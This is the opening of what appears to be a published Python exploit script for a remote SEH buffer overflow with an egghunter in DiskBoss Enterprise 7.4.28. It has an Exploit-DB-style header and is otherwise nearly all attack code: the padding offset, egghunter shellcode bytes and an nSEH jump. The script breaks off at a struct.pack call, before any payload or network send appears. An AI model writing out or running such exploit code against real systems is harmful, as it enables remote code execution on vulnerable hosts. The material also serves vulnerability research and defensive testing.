# Exploit Title: DiskBoss Enterprise 7.4.28 - 'GET' Remote Buffer Overflow (SEH - Egghunter) # Date: 2025-05-05 # Exploit Author: Fernando Mengali # Linkedin: https://www.linkedin.com/in/fernando-mengali-273504142/ # Vendor Homepage: https://www.diskboss.com # Software Link: htt*ps://www.exploit-db.com/apps/71a11b97d2361389b9099e57f6400270-diskbossent_setup_v7.4.28.exe # Version: 7.4.28 # Tested on: Windows XP - SP3 - English #!/usr/bin/python import socket import struct offset = b"A"*2455 egghunter = b"" egghunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd" egghunter += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x62\x30\x30\x6d" egghunter += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" offset += egghunter offset += b"A"*(2485-(len(egghunter)+2455)) # offset total 2487 nseh = b"\xeb\xcc\x90\x90" # jmp - 50 seh = struct.pack(b"